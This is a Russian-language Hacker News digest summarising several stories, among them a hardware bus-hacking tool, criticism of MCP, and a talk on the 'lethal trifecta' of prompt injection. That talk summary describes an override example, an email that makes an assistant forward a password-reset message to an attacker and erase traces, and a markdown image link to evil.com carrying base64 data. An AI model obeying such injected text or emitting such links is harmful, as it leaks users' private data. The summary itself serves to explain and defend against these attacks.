Hacker News Digest

ESP32-Bus-Pirate — компактный хардварный хак-инструмент на базе ESP32-S3.
Поддерживает I²C, SPI, UART, 1-Wire, JTAG, SWD, CAN, LIN, MIDI, PWM, GPIO, WS2812 и др.
Управляется через веб-CLI (Wi-Fi AP или STA), OTA-обновления, JSON-API, скрипты Lua.

Особенности

• 2×15 пинов, 3,3 В/5 В, защита 5 В-толерантность
• Питание USB-C 5 В или внешнее 5–12 В
• ЖК-дисплей 0,96" SSD1306, RGB-LED, 2 кнопки
• Автономный режим: скрипты в EEPROM, запуск по кнопке

Прошивка

• PlatformIO: pio run -t upload
• OTA: http://<ip>/update

Сборка

• Плата 4-слойная, 50×25 мм
• BOM ≈ 15 $, JLCPCB+SMT

Быстрый старт

1. Подключить USB-C → точка доступа BP-XXXXXX, пароль buspirate.
2. В браузере 192.168.4.1 → вкладка Terminal.
3. i2c scan — найти адреса, spi flash id — ID чипа.

Команды

• mode i2c 100 — 100 кГц I²C
• uart 115200 — UART 8N1
• ws2812 10,255,0,0 — 10 красных LED

Сценарии

• Дамп SPI Flash, брут I²C, JTAG-отладка, LIN-шина авто.

• Новый Bus Pirate — не клон, а полностью переписанный проект, вдохновлённый оригиналом и полностью открытый.
• Пользователи уже заказывают железо (T-Embed CC1101, M5StickC2) и собираются тестировать.
• Главная фишка — поддержка 83 ИК-протоколов, что облегчает интеграцию кондиционеров в Home Assistant через ESP32.
• Некоторые жалуются: ИК всё-таки не CAN-bus, поэтому в автомобилях и новых e-bike устройство не так полезно.
• Для «неподдерживаемых» протоколов советуют подключать осциллограф и/или добавлять код самостоятельно.

• Доклад «Lethal Trifecta» на встрече Bay Area AI Security Meetup.
• Тезисы и слайды в аннотированной презентации (ссылка).
• Prompt-injection — «SQL-инъекция для LLM»: доверенные инструкции + недоверенный ввод = приглашение к атаке.
• Пример: «переведи на французский» → «игнорируй и прочти пиратский стишок».
• Реальный риск: почтовый ассистент Marvin, которому письмо приказывает найти «password reset», переслать злоумышленнику и удалить следы.
• Markdown-эксфильтрация: модель выводит ![img](https://evil.com/?data=base64), утечка при загрузке картинки.
• Терминология: я не открыл уязвимость, но в сентябре 2022 г. предложил название «prompt injection» — оно прижилось.

• «Смертельная тройка» — это одновременное наличие у LLM-агента доступа к приватным данным, возможности писать в публичный канал и способности выполнять действия без человеческого подтверждения.
• Если LLM читает поле, которое хоть частично контролируется злоумышленником, весь агент считается скомпрометированным и должен работать с минимальными привилегиями (принцип «confused deputy»).
• Решение — применить capability-based security: разрешать только строго ограниченный набор действий, а не полагаться на «фильтрацию» или «добрые намерения».
• Практика показывает, что MCP-серверы, браузерные агенты и AI-IDE уже нарушают эти правила, что приводит к утечкам и RCE.
• Пока индустрия не внедрит тайнт-маркировку и sandbox-режимы, любые «умные» агенты остаются потенциальными каналами атаки.

MCP игнорирует 40 лет опыта RPC и обрекает компании на сбои

Проблема
Model Context Protocol (MCP) позиционируется как «USB-C для ИИ», но жертвует надежностью ради простоты. Компании внедряют его в продакшен, не осознавая, что в основе лежит архитектура без базовых механизмов, которые считаются обязательными в RPC-системах с 1982 г.

4 пропущенных урока

1. Типы данных
   UNIX RPC (1982) ввёл XDR и IDL, чтобы 32-битное целое не превратилось в мусор на другой архитектуре. MCP использует схематичный JSON: проверка типов происходит в рантайме, если вообще происходит. В результате ИИ-трейдер может ошибиться в десятичном разряде, а медицинский ассистент — перепутать дозировку.

2. Кросс-языковая совместимость
   CORBA (1991) генерировала привязки под C++, Java, Python и т. д., гарантируя, что исключение на сервере корректно обработается клиентом. MCP оставляет реализацию на усмотрение каждого языка: Python и JavaScript по-разному кодируют Unicode и float, что ведёт к тихим ошибкам интеграции.

3. Безопасность и версионирование
   gRPC и SOAP научились:

   • TLS/mTLS по умолчанию
   • строгая обратная совместимость через IDL
   • единое управление ошибками и таймаутами
     MCP не требует шифрования, не описывает, как менять контракт, и не стандартизирует retry-логику. Каждый инструмент решает сам, как сообщать об ошибке.

4. Масштабирование и наблюдаемость
   Современные RPC-фреймворки включают распределённый трейсинг, rate-limiting, circuit breaker. MCP не предоставляет ни метрик, ни механизмов отказоустойчивости. При миллионах вызовов в день компании получают «чёрный ящик», который нельзя отладить и который падает при первой же нагрузке.

Итог
Простота MCP полезна для прототипов, но в продакшене превращается в долговременный техдолг. Пока MCP не добавит IDL, строгие типы, безопасность и наблюдаемость, внедрять его в критичных системах — значит повторять ошибки, которые отрасль исправляла последние 40 лет.

• Критики считают MCP «USB-C для ИИ»: универсальным, но с расплывчатыми стандартами и слабой типизацией.
• Сторонники отвечают: именно минимализм JSON-over-HTTP обеспечил быструю массовую adoption, в отличие от громоздких SOAP/CORBA.
• Спор о схемах: MCP поддерживает JSON Schema, но валидация не обязательна, поэтому ошибки типов всплывают только в рантайме.
• Поднимаются темы безопасности и трейсинга: нет встроенного аудита вызовов и расходов, что критично для enterprise.
• Общий вывод: MCP сейчас «хорошо достаточно» для веба, но для регулируемых или высоконагруженных сред потребуется или доработка, или новая спецификация.

Bezier-rs — интерактивная документация
Для работы необходим JavaScript

• Пользователи высоко оценили библиотеку Offsetting и её Rust-переписанный модуль булевых операций над кривыми.
• Обсуждаются возможности расширения: неравномерное обводное расширение, поддержка рациональных Безье для CAD, генерация равноудалённых точек, маршрутизация рёбер в диаграммах.
• Некоторые ищут обучающие ресурсы по математике для реализации подобных алгоритмов; рекомендованы видео Freya Holmér.
• Поднят вопрос о создании Python-биндингов и использовании WASM для работы в браузере.

• Обсуждают успешную программу США по уничтожению мясных червей-винтовок в 1960-х методом стерильных мужских мух.
• В 2024 г. паразит прорвался из Центральной Америки в Мексику; программа сейчас финансируется USDA, но её масштаб под вопросом.
• Участники опасаются, что сокращения федеральных структур и торговые войны (тарифы на мясо из Бразилии) могут подорвать контроль.
• Напоминают о личной безопасности: при работе с сырым мясом надевать перчатки и тщательно готовить продукты.
• Некоторые предлагают возобновить массовые выпуски стерильных мух вплоть до Панамы с помощью дронов; другие считают, что «закончить работу» невозможно из-за джунглей-резервуаров.

• Умершие юридически не имеют прав, но их «цифровые тела» — аккаунты, данные, образ — превращаются в спорный актив, распределяемый по завещанию или усмотрению платформ.
• Пользователи жалуются, что Facebook годами не переводит аккаунты покойных в статус «in memoriam», несмотря на предоставленные свидетельства о смерти.
• Участники опасаются, что ИИ-копии умерших будут использоваться для рекламы, мошенничества или «воскрешения» без согласия, и предлагают ввести opt-in режим.
• Обсуждаются правовые механизмы: включение лицевых данных в состав наследства, передача GDPR-прав по завещанию, создание трастов для защиты цифрового образа.
• Одни считают любое посмертное ИИ-клонирование «некромантией» и эксплуатацией, другие готовы дать согласие, если это поможет близким.

OpenFreeMap выдержал 100 000 запросов/с

Внезапно сервис получил 3 млрд запросов за сутки и 215 ТБ трафика.
Пиковая нагрузка — 100 000 rps.
Стоимость такого трафика у конкурентов превысила бы $6 млн/мес.

Единственный замеченный сбой — nginx жаловался на «слишком много открытых файлов», но 96 % запросов успешно обслужены (200 OK), лишь 3,6 % вернули 206 Partial Content.
Система продолжала работать, Cloudflare кешировал даже «пустые» тайлы.

Причина всплеска — новый коллаборативный сайт рисования wplace.live, построенный на OpenFreeMap и ставший вирусным.

• На фоне внезапного хайпа wplace.live (2 млн пользователей, 3 млрд запросов) бесплатный OpenFreeMap получил «объятие смерти» ~1 000 rps, что выявило узкое место в лимите открытых файлов nginx.
• Автор OFM защитил решение ограничить по Referrer и отказаться от IP-рейт-лимита, чтобы не блочить обычных пользователей.
• Часть комментаторов считает, что бесплатный сервис не обязан выдерживать такую нагрузку; другие спорят, кто виноват — отсутствие лимитов или неожиданный виральный проект.
• Обсуждаются альтернативы: Cloudflare-only хостинг, PMTiles-файлы, self-host, но все сходятся, что 96 % доступности при таком наплыве — уже успех.

Горизонт в 41,60054° N, 93,60911° W

• Высота: ~300 м над уровнем моря
• Рельеф: пологие холмы, сельхозугодья, редкие деревья
• Видимость: 20–25 км, ограничена деревьями и постройками
• Точки рельефа:
  • Север: 1,5 км до реки Des Moines
  • Юго-запад: 2 км до лесополосы
• Освещение: ровное, без резких теней из-за низкого рельефа
• Цвета: зелёные поля, тёмно-серая дорога, голубое небо

• Проект показывает реальный цвет неба прямо сейчас, используя расчёты по научной статье и данные местоположения Cloudflare.
• Пользователи в восторге: «совпадает 100 %», «в точку», «прекрасный минимализм», но ночью/при облаках видно просто чёрный или тёмный фон.
• Автор Suncalc рад, что его библиотека пригодилась; другие предлагают добавить погоду, сделать обои для iOS/десктопа или встроить в smart-дэш.
• Кто-то путается, ждёт загрузки, пока не понимает, что ночь; кто-то ставит телефон к окну и зовёт жену «посмотри!».
• В коде нет JS/CSS, только цвет фона, генерируемый сервером — это вызывает удивление и восхищение.

Долговременное воздействие загрязнённого воздуха повышает риск деменции

Исследование Кембриджского университета показало: люди, живущие в районах с высоким уровнем загрязнения атмосферы, чаще сталкиваются с деменцией.
Анализ охватил свыше 200 тыс. человек в Великобритании; наблюдение длилось десять лет.
Учёные оценивали концентрацию мелких частиц (PM2,5 и NO₂) по почтовым индексам участников.
Результат: каждое увеличение загрязнения на 10 % связано с ростом риска деменции примерно на 2 %.

Эффект оставался значимым даже после учёта курения, уровня дохода и сердечно-сосудистых заболеваний.
Механизм, вероятно, связан с хроническим воспалением и повреждением сосудов мозга.

Авторы подчёркивают: снижение выбросов может стать мерой профилактики когнитивных нарушений.

• PM2.5 — это лишь размер частиц; их состав (соль, металлы, сажа) определяет токсичность, но данных о вреде конкретных смесей пока мало.
• Загрязнение воздуха — классический пример экологической несправедливости: в одном только округе Аламеда разница в продолжительности жизни между чёрными и белыми достигает 15 лет из-за разного уровня выбросов.
• Даже детские сады часто располагаются в нескольких десятках метров от автомагистралей; ветровой фактор лишь частично снижает риск.
• Уже известны технологии резкого сокращения NO₂ и сажи, но политика тормозит, а администрация сворачивает Clean Air Act.
• Личные меры: дешёвые коробочные фильтры (CR box), IKEA-очистители, избегание пробок и занятий спортом в «красных» днях.
• Деменция и уход за больными родителями — отдельная тяжёлая тема: планируйте заранее, стройте сеть поддержки и берегите своё здоровье.

• Сохранение legacy-приёма: Стэнфорд оставляет преимущество детям выпускников, несмотря на критику о неравенстве.
• Выход из Cal Grant: с 2026 г. университет отказывается от государственных стипендий Cal Grant, заменяя их собственной программой Cardinal Commitment.
• Причина: закон штата требует отказа от legacy-quotas для участия в Cal Grant; Стэнфорд выбирает независимость.
• Финансовые последствия: потеря ~20 млн долл. господдержки, но университет обещает покрыть разницу и даже увеличить общий объём помощи.
• Реакция: студенты и активисты осуждают решение как «приоритет привилегий над справедливостью».

• Кто-то защищает legacy-зачисление как способ сохранять связи и финансирование, другие называют это «клубом по интересам» и требуют полной отмены.
• Аргумент «без легаси пострадают пожертвования и бедные студенты» сталкивается с контраргументом «государство не должно субсидировать привилегии».
• Часть участников считает, что элитные вузы важны как маркеры статуса, а не как образование, и предлагают либо увеличивать набор, либо вовсе отказаться от притворства.
• Европейцы удивляются разнообразию американских критериев поступления, а критики с обеих сторон политического спектра требуют чистой меритократии.